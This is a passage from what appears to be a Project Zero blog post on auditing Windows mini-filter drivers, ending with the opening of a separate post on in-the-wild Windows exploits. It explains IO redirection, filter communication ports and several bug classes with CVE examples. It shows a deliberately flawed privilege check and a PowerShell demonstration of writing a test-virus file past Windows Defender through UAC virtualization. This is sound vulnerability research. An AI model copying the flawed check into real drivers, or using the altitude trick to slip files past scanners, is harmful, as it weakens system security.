  FileObject->FileName.Buffer = ExAllocatePool(PagedPool, 

                                        TargetFileName.Length);

  FileObject->FileName.MaximumLength = TargetFileName.Length;

  RtlCopyUnicodeString(&FileObject->FileName, TargetFileName);

  Data->IoStatus.Information = 0;

  Data->IoStatus.Status = STATUS_REPARSE;

  FltSetCallbackDataDirty(Data);

  return FLT_POSTOP_FINISHED_PROCESSING;

}

The code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 a IoReplaceFileObjectName API was introduced which makes this operation much less error prone, however LUAFV was written for Vista where the API didn’t exist so it had to make do. An official Microsoft example can be found in the SimRep sample driver.

One quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\windows\notepad.exe then FileName is set to \windows\notepad.exe. However, you can replace that with an absolute path such as \??\d:\abc.txt and that still works. Also the driver doesn’t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.

Complete the IO request with a success result

The driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you’re only updating the IO_STATUS_BLOCK you don’t need to mark the data as dirty.

Higher level filter drivers will still get their post-operation callbacks invoked if they’re registered for them, however no lower altitude drivers will be called with the IO request.

Complete the IO request with an error result.

This is basically the same as for a success code, just specifying a different NT status. There’s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success.

Pass the IO request to a different file or device stack

The filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they’re not.

The most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.

First, how can a filter driver interact with a file system volume it’s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call IoCreateFile (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.

This issue is solved through two mechanisms. The first is the filter manager exposes a set of APIs which mirror the kernel IO APIs but will only dispatch the IO request to filters below the caller. For example you can call FltCreateFileEx or FltWriteFile and be sure you won’t end up in a loop.

For file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the FltInsertExtraCreateParameter API. The filter driver can attach the ECP to the request, then check for its presence using FltFindExtraCreateParameter API, allowing it to ignore the request. For example the earlier code which shows how LUAFV implements a reparse operation shows calling LuafvSetEcp which sets an ECP on the request so that the new create request can be ignored by the driver.

The second issue is how do you actually pass on the parameters for the IO request to the new file you’ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.

A better approach is the driver can change the TargetFileObject field in the pre-operation callback’s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:

PREDIRECT_CONTEXT context = // Get driver’s allocated context.

if (context->FileObject) {

    Data->Iopb->TargetFileObject = context->FileObject;

    FltSetCallbackDataDirty(Data);

    return FLT_PREOP_SUCCESS_NO_CALLBACK;

}

Mini-Filter Communication

For there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is there's multiple places where untrusted data can be processed. Let’s go through the ways of identifying and analyzing these communication channels.

Device Object

A mini-filter doesn’t need to create any device object to perform its function, the filter manager deals with creating any necessary device objects. That doesn’t mean the driver can’t create one for its own purposes. A typical attack vector is the malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.

I’m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there’s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers (video, slides).

Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API FltCreateCommunicationPort.

PSECURITY_DESCRIPTOR SecurityDescriptor;

FltBuildDefaultSecurityDescriptor(

  &SecurityDescriptor,

  FLT_PORT_ALL_ACCESS

);

UNICODE_STRING Name;

RtlInitUnicodeString(&Name, L"\\FilterPortName");

OBJECT_ATTRIBUTES ObjAttr;

InitializeObjectAttributes(&ObjAttr, &Name, 0, NULL, SecurityDescriptor);

PFLT_PORT Port;

FltCreateCommunicationPort(

  Filter,

  &Port,

  &ObjAttr,

  NULL,

  ConnectNotifyCallback,

  DisconnectNotifyCallback,

  MessageNotifyCallback,

  100

);

The name of the port is specified using an OBJECT_ATTRIBUTES structure, in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the FltBuildDefaultSecurityDescriptor API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the FilterConnectCommunicationPort API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

typedef NTSTATUS

(*PFLT_CONNECT_NOTIFY) (

      PFLT_PORT ClientPort,

      PVOID ServerPortCookie,

      PVOID ConnectionContext,

      ULONG SizeOfContext,

      PVOID *ConnectionPortCookie

      );

The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my NtObjectManager PowerShell module run the following command:

PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName            

----                                      --------            

storqosfltport                            FilterConnectionPort

MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort

MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort

WcifsPort                                 FilterConnectionPort

MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort

BindFltPort                               FilterConnectionPort

MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort

CLDMSGPORT                                FilterConnectionPort

MicrosoftMalwareProtectionPortWD          FilterConnectionPort

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.

PS> $ports = ls NtObject:\ | 

Where-Object TypeName -eq "FilterConnectionPort"

PS> foreach($port in $ports.Name) {

    Write-Host "\$port"

    Use-NtObject($p = Get-FilterConnectionPort "\$port") {}

}

\BindFltPort

Exception: "(0x80070005) - Access is denied."

\CLDMSGPORT

Exception: "(0x8007017C) - The cloud operation is invalid."

We can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid.”. The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.

PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)

We can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

0: kd> !object \CLDMSGPORT

Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort

    ObjectHeader: ffffb487447ff890 (new version)

    HandleCount: 1  PointerCount: 4

    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT

0: kd> dx (((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7)

(((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7) : 0xffff8a888dccb0a0

0: kd> !sd 0xffff8a888dccb0a0 1

->Revision: 0x1

->Sbz1    : 0x0

->Control : 0x9004

            SE_DACL_PRESENT

            SE_DACL_PROTECTED

            SE_SELF_RELATIVE

->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)

->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)

->Dacl    :

->Dacl    : ->AclRevision: 0x2

->Dacl    : ->Sbz1       : 0x0

->Dacl    : ->AclSize    : 0x1c

->Dacl    : ->AceCount   : 0x1

->Dacl    : ->Sbz2       : 0x0

->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE

->Dacl    : ->Ace[0]: ->AceFlags: 0x0

->Dacl    : ->Ace[0]: ->AceSize: 0x14

->Dacl    : ->Ace[0]: ->Mask : 0x001f0001

->Dacl    : ->Ace[0]: ->SID: S-1-5-11 (Well Known Group: NT AUTHORITY\Authenticated Users)

->Sacl    :  is NULL

To dump the SD you first query for the object address of the filter communication port using the !object command. From the output you take the address of the OBJECT_HEADER structure and query the SecurityDescriptor field. Note you must clear the lower 3 bits of the address to make a valid security descriptor pointer. Finally we can print the security descriptor using the !sd command. The output shows that the security descriptor grants the Authenticated Users group access to connect to the port.

With an open handle to the port you can now send and receive messages. The filter manager supports both user to kernel and kernel to user message directions. For the user to kernel messages you call the FilterSendMessage API which sends a raw memory buffer to the filter driver and returns a separate buffer as shown in the following prototype:

HRESULT FilterSendMessage(

  HANDLE  hPort,

  LPVOID  lpInBuffer,

  DWORD   dwInBufferSize,

  LPVOID  lpOutBuffer,

  DWORD   dwOutBufferSize,

  LPDWORD lpBytesReturned

);

The message is delivered to the filter driver’s message notification callback specified when registering the mini-filter. The callback has the following prototype.

typedef NTSTATUS

(*PFLT_MESSAGE_NOTIFY) (

      IN PVOID PortCookie,

      IN PVOID InputBuffer OPTIONAL,

      IN ULONG InputBufferLength,

      OUT PVOID OutputBuffer OPTIONAL,

      IN ULONG OutputBufferLength,

      OUT PULONG ReturnOutputBufferLength

      );

The handling of the message is similar to a device IO control call. In fact under the hood it’s implemented using the device IO control code 0x8801B. As this code uses the METHOD_NEITHER method means the InputBuffer and OutputBuffer parameters are pointers into user-mode memory. The filter manager does check them before calling the callback with ProbeForRead and ProbeForWrite calls.

You can send a message to a filter connection port in PowerShell using the Send-FilterConnectionPort command specifying the data to send and the maximum size of the output buffer.

PS> Send-FilterConnectionPort -Port $port -Input @(0, 1, 2, 3) -MaximumOutput 0x100

For the kernel to user messages the user mode application needs to call FilterGetMessage to wait for the filter driver to send a message to user-mode. The kernel sends a message to the waiting user mode application using the FltSendMessage API which has the following prototype.

NTSTATUS FltSendMessage(

  PFLT_FILTER    Filter,

  PFLT_PORT      *ClientPort,

  PVOID          SenderBuffer,

  ULONG          SenderBufferLength,

  PVOID          ReplyBuffer,

  PULONG         ReplyLength,

  PLARGE_INTEGER Timeout

);

If there’s currently no waiting user mode process the API can wait a specified timeout until the application called FilterGetMessage. The returned buffer from FilterGetMessage contains a FILTER_MESSAGE_HEADER structure followed by the data. The header contains the size of the reply requested as well as a message ID which is used to correlate any reply to the kernel’s message.

To reply the user-mode application calls the FilterReplyMessage API. The user-mode application needs to append any data to a FILTER_REPLY_HEADER structure which contains the NT status code of the operation and the correlated message ID. The FltSendMessage API waits for the user-mode application to call FilterReplyMessage with the correct ID, and returns a buffer to the kernel-mode code. The message notification callback is not involved when using kernel to user-mode calls.

Filter Callbacks

Typically the purpose of the mini-filter callbacks would be to inspect or modify pre-existing IO requests to a file system. Therefore one way of getting untrusted data to the driver is based on how it handles IO requests.  However, it’s possible to add additional functionality on top of an existing file system to allow for communication between user mode and kernel mode. The filter driver can add a callback for device or file system IO control code requests and check and handle its own control codes. This allows the filter to implement additional functionality on existing files.

The following is a simple example of adding a FSCTL_REVERSE_BYTES FS IO control code to an existing file system. This FSCTL is not really supported by any filesystem.

#define FSCTL_REVERSE_BYTES CTL_CODE(FILE_DEVICE_FILESYSTEM,

                                     0x801,

                                     METHOD_BUFFERED,

                                     FILE_ANY_ACCESS)

FLT_PREOP_CALLBACK_STATUS

PreFsControlOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;

    if (ps->DeviceIoControl.Common.IoControlCode != FSCTL_REVERSE_BYTES) {

        return FLT_PREOP_SUCCESS_NO_CALLBACK;

    }

    char* buffer = ps->DeviceIoControl.Buffered.SystemBuffer;

    ULONG length = min(ps->DeviceIoControl.Buffered.InputBufferLength,

        ps->DeviceIoControl.Buffered.OutputBufferLength);

    for (ULONG i = 0; i < length; ++i)

    {

        char tmp = buffer[i];

        buffer[i] = buffer[length - i - 1];

        buffer[length - i - 1] = tmp;

    }

    Data->IoStatus.Status = STATUS_SUCCESS;

    Data->IoStatus.Information = length;

    return FLT_PREOP_COMPLETE;

}

The parameters for the FSCTL or IOCTL are separated based on the method of buffer access. In this case the FSCTL uses METHOD_BUFFERED so the parameters are accessed through the Buffered field. The filter driver needs to ensure it handles correctly all buffer types if it wants to implement its own control codes.

This technique is used by the Windows Overlay Filter (WOF). For example, the FSCTL code FSCTL_SET_EXTERNAL_BACKING is not supported by NTFS. Instead it’s intercepted by a pre-operation callback in the WOF filter which completes it before it reaches the NTFS driver. The NTFS driver never sees the control code, unless the WOF driver happens to not be enabled.

Reparse Points

Reparse point buffers are most commonly known for implementing symbolic link support for NTFS. However the reparse point feature of NTFS can store arbitrary tagged data which is used by filter drivers to store additional offline state information for a file. For example, WOF uses its own reparse buffer, with the tag IO_REPARSE_TAG_WOF to store the location of the real file or status of a compressed file.

A user-mode application would set, query and delete using FSCTL control codes, such as FSCTL_SET_REPARSE_POINT. The recommended way a mini-filter driver should set and delete a file’s reparse buffer is through the FltTagFile (and FltTagFileEx) and FltUntagFile APIs to set and remove the reparse buffer. Searching for the driver’s imported APIs should quickly show whether the driver uses its own reparse buffer format.

To open a file with the supported reparse point buffer the driver could register for the post-create callback and wait for any request which returns the STATUS_REPARSE NT status then query for the reparse point data from the TagData field in the FLT_CALLBACK_DATA parameter. If the reparse tag matches one the filter driver supports it can re-issue the create request but specify the FILE_OPEN_REPARSE_POINT flag to open the file and ignore the reparse point. There are many problems with this, not least it requires two IO requests for a single creation and the driver would have to process every reparse event.

To simplify this Windows 10 supports the ECP_TYPE_OPEN_REPARSE_GUID ECP. You add the ECP with a buffer containing an OPEN_REPARSE_LIST_ENTRY structure which defines the reparse tag the driver handles. When NTFS encounters a reparse point buffer it checks to see if it’s in the open reparse list. If so instead of returning STATUS_REPARSE the OPEN_REPARSE_POINT_TAG_ENCOUNTERED flag is set in the OPEN_REPARSE_LIST_ENTRY structure, the file is opened and success NT status code is returned. The filter driver can then check for the flag in the post-create callback, if set it can query the reparse tag from the file, for example using FSCTL_GET_REPARSE_POINT and handle accordingly.

The filter manager also exposes the FltAddOpenReparseEntry and FltRemoveOpenReparseEntry to simplify adding and removing these open reparse list entries. Searching for use of these APIs should give you an idea if the filter driver implements its own reparse point format.

The reason I mention this in the context of communication is that a filter driver will process these reparse buffers when accessing the file system. The NTFS driver only checks for the SeCreateSymbolicLinkPrivilege privilege if a user is writing the IO_REPARSE_TAG_SYMLINK tag. NTFS delegates the verification of the REPARSE_DATA_BUFFER structure which will be written to the file system by calling the kernel API FsRtlValidateReparsePointBuffer. The kernel API only does basic length checks for non-symlink tag types so the arbitrary bytes set in the DataBuffer field can be completely untrusted, which can allow for security issues during parsing.

Security Bug Classes

I’ve now provided examples of how a mini-filter operates and how you can communicate with it. Let’s finish up with an overview of potential bug classes to look for when doing a review. Some of these bug classes are common to any kernel driver, but others are very specifically due to the way mini-filters operate.

Where possible I’ll also provide an example of a vulnerability I’ve discovered to improve understanding. Note, this is not an exhaustive list, I’m sure there are some novel bug classes that I don’t know about which are missing from this list. Which is why it’s good to describe this process in more detail so others can take advantage of my knowledge and find new and interesting issues.

To aid in analysis I’ve uploaded my header file I use in IDA Pro to populate the filter manager types. You can get it from github. I’ve tried to ensure it’s correct and up to date, but there’s a chance that it is not. YMMV.

Common and garden variety memory safety hazards

Being native C code you can expect the same sorts of issues you’d find in any sizable code base including integer wrapping and incorrect reference counting leading to memory safety hazards. Any of the described communication methods could result in untrusted data being processed and mishandled. I don’t think I need to describe this in any detail.

Ignoring the RequestorMode Value

All filtered IO requests have an assigned RequestorMode parameter in the FLT_CALLBACK_DATA structure which indicates whether it originated from user or kernel mode code. If an IO request is dispatched from kernel mode code the IO manager and file system drivers typically disable security checks, such as file access checking.

There are a couple of related bug classes you’ll see with regards to RequestorMode. The first class is the filter driver ignoring its value. This can be a problem if the filter driver redirects the IO request to another file either directly or by using a reparse operation during file creation.

For example, CVE-2018-0877 was an issue I found in the WCIFS driver which provides file system virtualization for Desktop Bridge applications. The root cause was the driver would reparse to a user controllable location if the requested file didn’t exist in privileged Windows directories.

It’s common to find kernel code opening files inside privileged directories with RequestorMode set to the kernel. The kernel code can make the assumption this can’t be tampered with as only an administrator can normally modify those directories. The end result was a normal user application could get a file opened in the user controllable location but with access checking disabled. In the proof-of-concept in the issue tracker I exploit this to redirect a request for a National Language Support (NLS) file to ready arbitrary files on disk such as the SAM hive. The technique was described separately in this blog post.

Incorrect RequestorMode Check.

The second bug class in checking the RequestorMode can occur during a file create operation. Specifically the RequestorMode field is checked but the driver does not verify if access checking has been re-enabled through the IO_FORCE_ACCESS_CHECK flag passed to IoCreateFile and variants. For a bit more context on this bug class refer to my blog post from last year where I collaborated with Microsoft on related issues.

FLT_PREOP_CALLBACK_STATUS

PreCreateOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    if (!SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege, 

                                Data->RequestorMode)) {

        Data->IoStatus.Status = STATUS_ACCESS_DENIED;

        return FLT_PREOP_COMPLETE;

    }

    // Perform some privileged action.

    return FLT_PREOP_SUCCESS_WITH_CALLBACK;

}

The example above shows misuse of the RequestorMode field. It passes it directly to SeSinglePrivilegeCheck, if it indicates the call came from the kernel then the privilege check will always return TRUE meaning the privileged action will be taken. If you read the linked blog post, this can happen if the file is opened through calling IoCreateFileEx or similar APIs with incorrect flags.

To guard against this issue the driver needs to check if the SL_FORCE_ACCESS_CHECK flag has been set in the OperationFlags field of the FLT_IO_PARAMETER_BLOCK structure. If that flag is set the value of RequestorMode should always be assumed to be from user mode.

Driver and Kernel IO Operation Mismatch

The Windows platform is constantly iterating new features, this is even more true since the release of Windows 10 and its six month release cycles. This can introduce new features to the IO stack such as new information classes or IO control codes or additional functionality to existing features.

For the most part the mini-filter driver can just ignore operations it doesn’t care about. However, if it does process an IO operation it needs to match with what’s implemented in the rest of the OS, which can be difficult if the OS changes around the driver.

An example of this issue is the WOF driver’s handling of reparse points. To prevent applications from setting arbitrary reparse points with the IO_REPARSE_TAG_WOF tag it handles the FSCTL_SET_REPARSE_POINT IO control code and rejects any attempt to set a reparse point buffer with that tag. To complete the trick the driver also hides a file’s reparse point from being queried or removed if it’s set to IO_REPARSE_TAG_WOF.

The issue CVE-2020-17139 resulted from the OS adding a new FSCTL_SET_REPARSE_POINT_EX IO control code which the WOF driver didn’t handle. This allowed an application to add or remove the WOF IO tag which resulted in a way of getting an arbitrary file to have a cached code signature to bypass mechanisms such as Windows Defender Application Control.

Altitude sickness.

Sorry, I couldn’t resist the pun. This is a bug class which is caused by the ordering of filter operations based on the assigned altitudes of the driver. For example, if you look at the list of filters from the fltmc command shown earlier in this blog post you’ll notice that WdFilter which is the real-time scanner for Windows Defender is at a much higher altitude than LUAFV which is the UAC file virtualization driver.

What this means is if LUAFV performs some operations, such as calling FltCreateFileEx which only dispatches the IO request to filters below LUAFV then Windows Defender will miss the file operations and not be able to act on them. Let’s show this in action with a simple PowerShell script.

function Write-EICAR {

    param([string]$Path)

    # Replace with a real EICAR string.

    $eicar = [System.Text.Encoding]::ASCII.GetBytes("<EICAR>")

    Use-NtObject($f = New-NtFile -Win32Path $Path -Disposition OpenIf -Access ReadData, WriteData) {

        $f.Length = 0

        Write-NtFile $f $eicar -Offset 0

    }

}

PS> Write-EICAR -Path "$env:TEMP\eicar.txt"

PS> Enable-NtTokenVirtualization

PS> Write-EICAR -Path "$env:windir\system32\license.rtf"

The Write-EICAR function opens or creates a new file at a specified path, truncates the file to a zero length, writes the EICAR string then closes the file. Note I’ve replaced the EICAR string with the dummy <EICAR>. You’ll need to look up the real string online and replace it before running the test. I did this to prevent some overzealous AV detecting the EICAR string and quarantining this web page.

We create an EICAR file in the temporary folder. Once the file has been closed Windows Defender’s real-time scanner should scan it and warn the user that it has quarantined the file.

However, once we enable virtualization using Enable-NtTokenVirtualization and write to an existing system file the file processing is handled inside the LUAFV driver after WdFilter has done its checking. Therefore the second command will succeed, although the file which is actually created is in the user’s virtual store, we’ve not overwritten license.rtf.

Worth pointing out that this only allows you to create the file on disk. The instant that virtualized file is used by any application Windows Defender will see it and quarantine it. Therefore it provides no real value to bypass Windows Defender’s signature checks. However, I think this is an interesting demonstration of the types of issues you could find due to the differing altitudes.

The mismatch with the filter altitude is also a potential reason you’ll miss file events in Process Monitor. Process Monitor runs its mini-filter to capture file events at altitude 385200 which is above LUAFV. You will not see most direct virtualization events. However we can do something about this, we can use fltmc to detach the Process Monitor filter from a volume and reattach at a much lower altitude. Start Process Monitor then run the following commands to reattach to the C: drive.

C:\> fltmc detach PROCMON24 C:

C:\> fltmc attach PROCMON24 C: -i "Process Monitor 24 Instance" -a 100

You might need to replace 24 with an appropriate version number for your version of Process Monitor. You should start seeing more events which were previously hidden by LUAFV and other filter drivers at lower altitudes. This should help you monitor file access for any interesting behavior. Sadly even though you can try and attach the Process Monitor filter to the named pipe device it won’t work as the driver doesn’t indicate support for that device.

Note, that stopping and starting the Process Monitor capture will reset the volume instances for the filter driver and remove the low altitude instance. If you create the new instance without the instance name (the string after -i) then it won’t get deleted, however Process Monitor will show duplicate entries for any IO request which is the same at both altitudes. The Process Monitor driver does not support attaching at a different altitude through any command line options, this would be one of those cases where it’d be useful for this tooling to be open source so that this feature could be added.

As an example before adding the low altitude instance if you create the EICAR test file you’ll see the following events:

ID

Path

Operation

Result

Detail

0

C:\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Read Data, Write Data

1

C:\Windows\System32\license.rtf

SetEndOfFile

SUCCESS

EndOfFile: 0

2

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

WriteFile

SUCCESS

Offset: 0, Length: 68

3

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CloseFile

SUCCESS

I’ve added an ID column which indicates the event taking place. The events match the code for creating the EICAR file, we open the file for read and write access, set the length to 0, write the EICAR string and then close the file. Note that in event ID 2 the path to the file has changed from the original one in system32 to the virtual store. This is because the file is “delay virtualized” so it’ll only be created if a write IO request, such as changing the file length, is dispatched to the file.

Now let’s compare the events when the altitude is set to 100:

ID

Path

Operation

Result

Detail

0

C:\Windows\System32\license.rtf

CreateFile

ACCESS DENIED

Desired Access: Read Data, Write Data

C:\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Read Data

1

C:\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Read Data, Read Attributes

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Write Data, Write Attributes

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

SetEndOfFile

SUCCESS

EndOfFile: 538

C:\Windows\System32\license.rtf

ReadFile

SUCCESS

Offset: 0, Length: 538

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

WriteFile

SUCCESS

Offset: 0, Length: 538

C:\Windows\System32\license.rtf

ReadFile

END OF FILE

Offset: 538, Length: 16,384

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CloseFile

SUCCESS

C:\Windows\System32\license.rtf

CloseFile

SUCCESS

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Read Data, Write Data

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

SetEndOfFile

SUCCESS

EndOfFile: 0

2

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

WriteFile

SUCCESS

Offset: 0, Length: 68, Priority: Normal

3

C:\Windows\System32\license.rtf

CloseFile

SUCCESS

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CloseFile

SUCCESS

You can see that the list of events is much longer in the second case (I’ve even removed some for brevity). For event 0 it’s no longer a single create IO request for the license.rtf file. As the user doesn’t have write access when the create call is made to the file system it results in an ACCESS DENIED error. The LUAFV driver sees the error in its post-create callback and as virtualization is enabled it makes a second create for only read access. This second create succeeds. Due to the altitude of LUAFV this process is normally hidden from the Process Monitor.

In the first table event ID 2 we saw the caller setting the file length to 0. However in the second table we now see that the virtual file needs to be created and the contents of the original file are copied into the new virtual file. Only after that operation has been completed will the length of the file be set to 0. The last 2 events are more or less the same.

I hope this is a clear demonstration both of how the altitude directly affects the operation of mini-filter drivers as well as how much file information you might be missing in Process Monitor without realizing it.

Concurrency and Reentrancy

The IO manager is designed to operate asynchronously. It’s possible that multiple threads could be calling into the same IO driver at the same time and the filter manager is no different. There’s no explicit locking in the filter manager which would prevent multiple IO requests being dispatched at the same time to the same file object. This can lead to concurrency and reentrancy issues.

The filter driver can assign shared state based on the file stream or file object. This can be extracted in the filter when operating on the file and used to store and retrieve the current state information. If you dispatch multiple IO requests to the same file it can result in an invalid state or memory corruption issues.

An example of this kind of issue is CVE-2019-0836 which was a race condition in the LUAFV driver related to handling of the SECTION_OBJECT_POINTERS structure in the file object. Basically by racing a read against a write IO request on the same file it was possible to get the wrong SECTION_OBJECT_POINTERS structure assigned to the virtual file allowing a normal user to bypass access checks and map a read-only file as writable.

To solve this problem the driver needs to not maintain complex state between pre and post operation callbacks or over any calls out to any API which could be trapped by a user-mode application.

Incorrect Forwarding of IO Operations

We showed earlier how to retarget an IO operation to another file object by switching the TargetFileObject pointer. This needs to be done very carefully as when working with file object pointers directly almost any operation can be performed on them. For example, if a file is opened read-only a write operation can still be dispatched to the file object itself and it’ll succeed.

The only thing which prevents a user-mode application from doing this is the kernel checks that the handle passed by the application to the NtWriteFile system call has the FILE_WRITE_DATA access right set. If not the system call can return STATUS_ACCESS_DENIED. However, if the handle has write access to a file object, but the filter driver redirects that operation to a read-only file then the check is bypassed and the user can write to a file they don’t necessarily control.

Another place this can happen is the dispatch of IO control codes. Each control code has a flag which indicates if the file handle requires read and/or write access to be dispatched. This check is performed in the IO manager before the request ever makes it to the file system. If the filter drivers blindly forward IO control codes to a separate file it could send a code which normally requires write access on the handle bypassing security checks.

The LUAFV driver is a good example of a mini-filter driver where this forwarding takes place. The previously mentioned issue, CVE-2019-0836 while it’s a concurrency issue also relies on the fact that the file object can be written to even though it was opened read-only.

Summary

In summary I think that mini-filter drivers are an under-appreciated source of privilege escalation bugs on Windows. In part that’s because they’re not easy to understand. They have complex interactions with the rest of the IO system which makes understanding difficult but can introduce really subtle and interesting issues. I hope I’ve given you enough information to better understand how mini-filter drivers function, how you communicate with them and what sorts of unique bug classes you might discover.

If you want some more information a good blog on the inner workings of filters drivers is Of Filesystems and Other Demons. It’s not been updated in a long while but it still contains some valuable information. You can also refer to MSDN which has a fairly comprehensive section on mini-filters as well as the Windows Driver Kit sample code. Finally as a reminder I’ve uploaded a filter manager header file for use in reverse engineering tools such as IDA Pro.

In-the-Wild Series: Windows Exploits

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

Background

The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

